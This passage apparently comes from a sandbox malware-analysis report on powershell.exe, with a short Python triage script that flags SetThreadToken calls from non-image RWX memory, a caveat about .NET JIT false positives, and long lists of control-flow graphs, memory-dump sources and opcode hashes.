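    f = (name[:-5] if name.endswith(".sdmp") else name).split(".")
    return {"pid": int(f[0], 16), "stage": int(f[1], 16), "base": int(f[3], 16),
            "protect": PAGE_PROTECT.get(int(f[4], 16), f[4]),
            "type": MEM_TYPE.get(int(f[6], 16), f[6]), "raw": f}


def triage(name: str, graph: str, api: str, based_on_pe: bool):
    """Return (verdict, ids of nodes calling `api`, decoded dump info)."""
    info = parse_sdmp_name(name)
    _, nodes, _ = parse_graph(graph)
    hits = sorted(n.nid for n in nodes.values() if api in n.apis)
    rwx = info["protect"] == "PAGE_EXECUTE_READWRITE"
    if hits and rwx and not based_on_pe and info["type"] == "MEM_PRIVATE":
        verdict = f"suspicious: {api} called from non-image RWX private memory"
    else:
        verdict = "no finding"
    return verdict, hits, info


# Dump name and graph copied from the SetThreadToken entry of the report above.
SDMP = "0000000D.00000002.1690247208.0000000008B80000.00000040.00000800.00020000.00000000.sdmp"
CFG = ("control_flow_graph 493 8b87470-8b874b3 494 8b874bb-8b874e7 SetThreadToken "
       "493->494 495 8b874e9-8b874ef 494->495 496 8b874f0-8b8750d 494->496 495->496")

if __name__ == "__main__":
    verdict, hits, info = triage(SDMP, CFG, "SetThreadToken", based_on_pe=False)
    print(f"pid={info['pid']} base={info['base']:#x} {info['protect']} {info['type']}")
    print(verdict, "in nodes", hits)
```

Treat the verdict as a triage hint rather than proof of injection: powershell.exe hosts the .NET CLR, whose JIT also emits code into private RWX regions that are not backed by a PE image, so a SetThreadToken call site found there needs to be correlated with the process tree and the other signatures in the report before it is called malicious.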

                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                          control_flow_graph 618 7913ce8-7913d0d 619 7913f00-7913f4a 618->619 620 7913d13-7913d18 618->620 628 7913f50-7913f55 619->628 629 79140ce-79140ea 619->629 621 7913d30-7913d34 620->621 622 7913d1a-7913d20 620->622 626 7913eb0-7913eba 621->626 627 7913d3a-7913d3c 621->627 624 7913d22 622->624 625 7913d24-7913d2e 622->625 624->621 625->621 630 7913ec8-7913ece 626->630 631 7913ebc-7913ec5 626->631 632 7913d4c 627->632 633 7913d3e-7913d4a 627->633 635 7913f57-7913f5d 628->635 636 7913f6d-7913f71 628->636 652 79140f4-7914112 629->652 653 79140ec-79140f3 629->653 637 7913ed0-7913ed2 630->637 638 7913ed4-7913ee0 630->638 634 7913d4e-7913d50 632->634 633->634 634->626 645 7913d56-7913d75 634->645 641 7913f61-7913f6b 635->641 642 7913f5f 635->642 646 7914080-791408a 636->646 647 7913f77-7913f79 636->647 644 7913ee2-7913efd 637->644 638->644 641->636 642->636 675 7913d85 645->675 676 7913d77-7913d83 645->676 648 7914097-791409d 646->648 649 791408c-7914094 646->649 650 7913f89 647->650 651 7913f7b-7913f87 647->651 657 79140a3-79140af 648->657 658 791409f-79140a1 648->658 656 7913f8b-7913f8d 650->656 651->656 660 7914228-791424a 652->660 661 7914118-791411d 652->661 653->652 656->646 663 7913f93-7913fb2 656->663 664 79140b1-79140cb 657->664 658->664 678 7914254-791425d 660->678 679 791424c 660->679 665 7914135-7914139 661->665 666 791411f-7914125 661->666 703 7913fc2 663->703 704 7913fb4-7913fc0 663->704 673 79141da 665->673 674 791413f-7914141 665->674 671 7914127 666->671 672 7914129-7914133 666->672 671->665 672->665 680 79141db-79141e4 673->680 682 7914151 674->682 683 7914143-791414f 674->683 684 7913d87-7913d89 675->684 676->684 689 791428b-7914295 678->689 690 791425f-7914281 678->690 679->680 686 791424e-7914253 679->686 687 79141f1-79141f7 680->687 688 
79141e6-79141ee 680->688 691 7914153-7914155 682->691 683->691 684->626 692 7913d8f-7913d96 684->692 686->678 694 79141f9-79141fb 687->694 695 79141fd-7914209 687->695 698 7914297-791429c 689->698 699 791429f-79142a5 689->699 729 7914283-7914288 690->729 730 79142d5-79142fe 690->730 691->673 697 791415b-791415d 691->697 692->619 702 7913d9c-7913da1 692->702 705 791420b-7914225 694->705 695->705 707 7914177-791417e 697->707 708 791415f-7914165 697->708 700 79142a7-79142a9 699->700 701 79142ab-79142b7 699->701 711 79142b9-79142d2 700->711 701->711 712 7913da3-7913da9 702->712 713 7913db9-7913dc8 702->713 714 7913fc4-7913fc6 703->714 704->714 709 7914180-7914186 707->709 710 7914196-79141d7 707->710 716 7914167 708->716 717 7914169-7914175 708->717 718 7914188 709->718 719 791418a-7914194 709->719 722 7913dab 712->722 723 7913dad-7913db7 712->723 713->626 735 7913dce-7913dec 713->735 714->646 724 7913fcc-7914003 714->724 716->707 717->707 718->710 719->710 722->713 723->713 747 7914005-791400b 724->747 748 791401d-7914024 724->748 744 7914300-7914326 730->744 745 791432d-791434a 730->745 735->626 746 7913df2-7913e17 735->746 744->745 756 7914354-791435c 745->756 757 791434c-7914353 745->757 746->626 771 7913e1d-7913e24 746->771 750 791400d 747->750 751 791400f-791401b 747->751 753 7914026-791402c 748->753 754 791403c-791407d 748->754 750->748 751->748 758 7914030-791403a 753->758 759 791402e 753->759 763 7914395-791439f 756->763 764 791435e-791437b 756->764 757->756 758->754 759->754 766 79143a1-79143a5 763->766 767 79143a8-79143ae 763->767 776 79143e5-79143ea 764->776 777 791437d-791438f 764->777 769 79143b0-79143b2 767->769 770 79143b4-79143c0 767->770 773 79143c2-79143e2 769->773 770->773 774 7913e26-7913e41 771->774 775 7913e6a-7913e9d 771->775 783 7913e43-7913e49 774->783 784 7913e5b-7913e5f 774->784 792 7913ea4-7913ead 775->792 776->777 777->763 786 7913e4b 783->786 787 7913e4d-7913e59 783->787 789 7913e66-7913e68 784->789 786->784 787->784 789->792
Memory Dump Source
• Source File: 0000000D.00000002.1681568298.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7910000_powershell.jbxd
Similarity
• Opcode ID: 8ff92f19f9030405e13a10a85b16c375fb77614768766452b9c059c01bf8b277
• Instruction ID: 1df80eee6989626356b5c18e2d7134743957acacb6d67fa9e32507b44715a862
• Opcode Fuzzy Hash: 8ff92f19f9030405e13a10a85b16c375fb77614768766452b9c059c01bf8b277
• Instruction Fuzzy Hash: D81258B170435A8FDB259B6898017AA7BB6AFC6319F24C4BAD805CB3A1DB31C851C791

Control-flow Graph
Memory Dump Source
• Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
Similarity
• Opcode ID: a8742217235ab950c3ea5c361e18cac9dd2035700f5956878dd06180b3c1f6da
• Instruction ID: 4723c47faf4e5146421f9b898cf2d119446a11202c6baf6930c37d029b3de46d
• Opcode Fuzzy Hash: a8742217235ab950c3ea5c361e18cac9dd2035700f5956878dd06180b3c1f6da
• Instruction Fuzzy Hash: E2918D74A006058FDB19DF58C4D4AAEFBB1FF88310B248599D816AB765C739FC51CBA0
Memory Dump Source
• Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
Similarity
• Opcode ID: 5bc2b5313ddbef564779449d4faa6d7b25318a20bd5229fc68918c5148bcdbec
• Instruction ID: c2b540c5597accc98e2c588589dd734060b42b3df9ceeec17ccbb6fe82100266
• Opcode Fuzzy Hash: 5bc2b5313ddbef564779449d4faa6d7b25318a20bd5229fc68918c5148bcdbec
• Instruction Fuzzy Hash: BC51C1303042019FD704DB7AD844A6A77EAFFC9218B2545B9E50ACB352EF35EC02CB90
Memory Dump Source
• Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
Similarity
• Opcode ID: 89892e4d453918fa4c5817b07e49ee8a13fef9cdebd6589ce1b594a0af22703f
• Instruction ID: e270f3ac48737bf6519177c2cfca54a61b150a4a965d4aab5fcdad4330374947
• Opcode Fuzzy Hash: 89892e4d453918fa4c5817b07e49ee8a13fef9cdebd6589ce1b594a0af22703f
• Instruction Fuzzy Hash: 2C611471E00258CFDB14CFA9C584B9DBBF1EF88310F1581AAE919AB264EB34AD41CB50
Memory Dump Source
• Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
Similarity
• Opcode ID: c5a8ba275c60fa17a54451fc232f281ac6f7c7b84786d2877cf1718481779bcb
• Instruction ID: 75706121cf92b9dfe593528bf43dd29606441b021526e0bd93a2c941057ab684
• Opcode Fuzzy Hash: c5a8ba275c60fa17a54451fc232f281ac6f7c7b84786d2877cf1718481779bcb
• Instruction Fuzzy Hash: EC511671E04258DFDB14DFA9D484A9DBBF1FF88310F1580AAE919EB364EB34A941CB50
Memory Dump Source
• Source File: 0000000D.00000002.1681568298.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7910000_powershell.jbxd
Similarity
• Opcode ID: 8984ae7bbd369097b4bf4e977db7d32911742dc27eb1ab608c70613a396c8639
• Instruction ID: b3ef538719b4ff0df6cd63301326ec5915f376999c3f699421dc945e00b74b83
• Opcode Fuzzy Hash: 8984ae7bbd369097b4bf4e977db7d32911742dc27eb1ab608c70613a396c8639
• Instruction Fuzzy Hash: 2F4116F4B1030ADBCB218F24D5016BA7BB69F86218F14C0AAD8049F755DB31DC55CBA1
Memory Dump Source
• Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
Similarity
• Opcode ID: 825d23ae9eaa19dd12e8c6e519591241e0f547691a2a9b7437227d6ac029d085
• Instruction ID: a7252489282334426cf48e0f222cd882938e420a18570ff2f16f5c6b1f5f0a84
• Opcode Fuzzy Hash: 825d23ae9eaa19dd12e8c6e519591241e0f547691a2a9b7437227d6ac029d085
• Instruction Fuzzy Hash: 46410834B042048FDB15DBA5C858AAABBF2EF8D715F145099E906EB391DF39AC01CB61
Memory Dump Source
• Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
Similarity
• Opcode ID: b7502b8bdc2e241eaf2389a4be7a290f672847ce5b5fc56327b08d5e0235c356
• Instruction ID: 427ffe9041aee3611efd59b38d109798ff83b21bab58deaa1237759877c57679
• Opcode Fuzzy Hash: b7502b8bdc2e241eaf2389a4be7a290f672847ce5b5fc56327b08d5e0235c356
• Instruction Fuzzy Hash: 7D414A74A006059FDB09DF58C4D8AAEFBB1FF88310B158599D816AB764C73AFC51CBA0
Memory Dump Source
• Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
Similarity
• Opcode ID: bf08e860d38c9a27d829fe537b5402bed3c145916d1150a93e9a1c154dc23c13
• Instruction ID: 284239614a8ef85d26d88716498c933521c29c13cf5ec260739cd37294f9e5f6
• Opcode Fuzzy Hash: bf08e860d38c9a27d829fe537b5402bed3c145916d1150a93e9a1c154dc23c13
• Instruction Fuzzy Hash: E6319E313007019FE715DB78D844B9ABBA2FFC4615F0486B9DA0ACB355DF75A805CB91
Memory Dump Source
• Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
Similarity
• Opcode ID: 3ee5efd7134e0bdb726af023ca54bb24a748787a321fcd59dd996bf044fa7db3
• Instruction ID: 4c224efcc02b924a1dcafbf924c0fdaaf47319b93bec519d2b1fb661b0839650
• Opcode Fuzzy Hash: 3ee5efd7134e0bdb726af023ca54bb24a748787a321fcd59dd996bf044fa7db3
• Instruction Fuzzy Hash: 8731D834A002058FDB15CFA5C558AAABBF2EF8D715F1550A9E806EB361DF35EC01CB60
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 6d90927fc2607c3c9ac80fc50eca228c38401649c234e2c062850c270b41b061
                                                                                                                                                                                                                          • Instruction ID: 459d4241627f93040e1369a94137bbf8d0f5e503d926ce1232f1490395241e1e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6d90927fc2607c3c9ac80fc50eca228c38401649c234e2c062850c270b41b061
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DB315E70E016059FDF15DFA9D4947AE7BF6EF89300F1180A9E506EB250EB38AC418B55
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 5a384ed403df1ab2a4dc5094b3066dc30fb8493e18bce762ddb9f3cf8d1c4636
                                                                                                                                                                                                                          • Instruction ID: 64b512bc702f0ea4a51d13ec5ffece44c4086082a9c765de1b35ab5ca9f5e029
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5a384ed403df1ab2a4dc5094b3066dc30fb8493e18bce762ddb9f3cf8d1c4636
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB3194B0A002059FEB04EFA4D854AAE7BB2EFC5304F1584B9D605AB395DA39ED01CF61
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: c4a2378804d5a625887babdc632f807b44da43569096eacdeac05660eb955229
                                                                                                                                                                                                                          • Instruction ID: 01632f466351bbdc683b13785d04cbd8e5fd499b692df58563227f33eb67c964
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c4a2378804d5a625887babdc632f807b44da43569096eacdeac05660eb955229
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B3315C70A016098FDF15DFA9D4947AEBAF6EF89200F1180A9E506E7350EB38AC018B51
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: ad732a825cb5b1d23d169753c2b681b49637d8520b4e1731b9a8402413eda2ee
                                                                                                                                                                                                                          • Instruction ID: 858a4a8ece6d12519e23873f6d2461364778f40604390e40874401d4afc214d2
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ad732a825cb5b1d23d169753c2b681b49637d8520b4e1731b9a8402413eda2ee
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EA21B271A043188FDB15DFAAD840B9FBBF5EF89320F14846ED519E7340CB78A9058BA5
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 9a441147ae296a716f0064153b3098ffbf56313e4e7ad8e2898822046422b624
                                                                                                                                                                                                                          • Instruction ID: 4612a46104e5b73f14feab237c47cfaadb2c59a17902f9f49765f4add5c7bc80
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9a441147ae296a716f0064153b3098ffbf56313e4e7ad8e2898822046422b624
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A3130B4A002099FEB04EBA5D854ABE77B2EFC4304F108479DA15AB394DA39ED018F90
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1681568298.0000000007910000.00000040.00000800.00020000.00000000.sdmp, Offset: 07910000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7910000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 289c988a99553f8a442ec66e07956337248958f9116fccff6053b2dad531c488
                                                                                                                                                                                                                          • Instruction ID: b6073fc107bcf7063550d0b87d7f26e0f1dc796b34bbca364259f7e3036f346e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 289c988a99553f8a442ec66e07956337248958f9116fccff6053b2dad531c488
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0521BFB5B0020EDFDB20EF59C545B6677F9BB45329F0480A6D8048B750D374E964CB61
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 32f6f7ab8328c724d44b430b531b6c442f35de8638222489de88a98751caf02b
                                                                                                                                                                                                                          • Instruction ID: 0fabda5c9a7c8ef937a9e0818311cb0fce3b7994dbe989fdcb918f8c73e6c55f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 32f6f7ab8328c724d44b430b531b6c442f35de8638222489de88a98751caf02b
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 84315CB49057448EDB60CF6AD48878AFFF2EF88310F28809DD94E9B215DB786445CB61
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1654639303.00000000049FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 049FD000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_49fd000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 62f371f99b3ccf1d138e2c0d31bbe342c0094338c4141b30f404756ada02e33f
                                                                                                                                                                                                                          • Instruction ID: 31a359f2aab6d07e899fb7d8beb6a1bd83cf38eb61b134014af4a10b9361f898
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 62f371f99b3ccf1d138e2c0d31bbe342c0094338c4141b30f404756ada02e33f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9421F776604300DFDF05DF10DDC8B16BB66FB88314F24C5AEEA090A25AC336E456CBA1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1654639303.00000000049FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 049FD000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_49fd000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 39f3ca45c664f8a0659edba1fef0b0979116d3bfb69153b76ccc68e300dded10
                                                                                                                                                                                                                          • Instruction ID: bb71977caab807db00fa155875629b1ec8c407c539d7b1ffa38b848570d13198
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 39f3ca45c664f8a0659edba1fef0b0979116d3bfb69153b76ccc68e300dded10
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9C2103756042009FDB10DF10D984B16BB65EB84324F28C9BADE094B24AC336E446CB61
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 4d5de4116fb09bc31159006f3ad461746afe7125dd94d776ba0f6f5d24612770
                                                                                                                                                                                                                          • Instruction ID: bc733b5a41924726e14ac590e8921cc76f4ad3731dc7231d5865f7a3898a85fb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4d5de4116fb09bc31159006f3ad461746afe7125dd94d776ba0f6f5d24612770
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C2F0DC313093A06FD3018A699C409AA7FB8EF86220B0944BBF940CB262DA74CC00C760
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 94e8d66bb9f9de7b7a7a70d1e20cedc1b84dfe874bcb9586afa90166e71337c2
                                                                                                                                                                                                                          • Instruction ID: 242dbb42cccd8c9503bc20387c732897923e69efb578b9d8c13da542abd2f4b8
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 94e8d66bb9f9de7b7a7a70d1e20cedc1b84dfe874bcb9586afa90166e71337c2
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 96F022303053409FD3359B68A84496F7BF8EF896207000AAEE40AC7651EE386C81C771
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: f62448f85dfb436c5067ac81491af50090bb6c6813cd4b30b226536852c8c01f
                                                                                                                                                                                                                          • Instruction ID: 9a761629f9d4d5d4027fcb19bee202a622257051050ad6d0a9740000f611eeba
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f62448f85dfb436c5067ac81491af50090bb6c6813cd4b30b226536852c8c01f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50F0B4327057549F9712A76DE8108EA7B6DEEC627171504EBD50AC7200EA28A905C7F2
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: c993d34ab4e582bd515987a4628b131f5e65a45846777339af2396c7c4094205
                                                                                                                                                                                                                          • Instruction ID: 334749a49a19fddb94b8c7d0b095db824f340899cbc1070f27560114cc6a11b0
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c993d34ab4e582bd515987a4628b131f5e65a45846777339af2396c7c4094205
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F801AF31644200AFE725AF78D4143AB7B61EFC331CF1581AAC9464B296DE3A6806CBA1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1654639303.00000000049FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 049FD000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_49fd000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: d966ce5a3acac3ca49459d1444423a8705750c68d63043c8037b85cd094ddcb4
                                                                                                                                                                                                                          • Instruction ID: 97007bafdf362e949026b12f7175114b362a3dbacace38d65e7971700fabc300
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d966ce5a3acac3ca49459d1444423a8705750c68d63043c8037b85cd094ddcb4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C6F0F976200600AF97248F0ADD85C27FBADEFD4770719C56AE94A4B612C671FC41CFA0
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 8db06caaf278d4212804e0b97e70d7935a84f0083730754f7dc1933e9ba2a420
                                                                                                                                                                                                                          • Instruction ID: 8b228b14f1ceb5032220e2d00c4ea169e4cc69239201437902fd226b111f9834
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8db06caaf278d4212804e0b97e70d7935a84f0083730754f7dc1933e9ba2a420
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CDF05E353042508FC3008F19D894966BBF9EFCE61531914E9E486CB372DA61EC02CB90
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: 980b9447eb671a66f04e015d352d3df7c707c9b5e97dc13eb0f9baea956f7f22
                                                                                                                                                                                                                          • Instruction ID: 1a2c3f04701b50291c0aa5ca0bd2e6b2ca7ed9b72c2a2cb644e7688d14ebf429
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 980b9447eb671a66f04e015d352d3df7c707c9b5e97dc13eb0f9baea956f7f22
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 10F0B4705053009FD3219B78D4A9396BFF4FB01310F5588AAD14EC7242DB396C81CB50
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1655423378.0000000004B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_4b60000_powershell.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
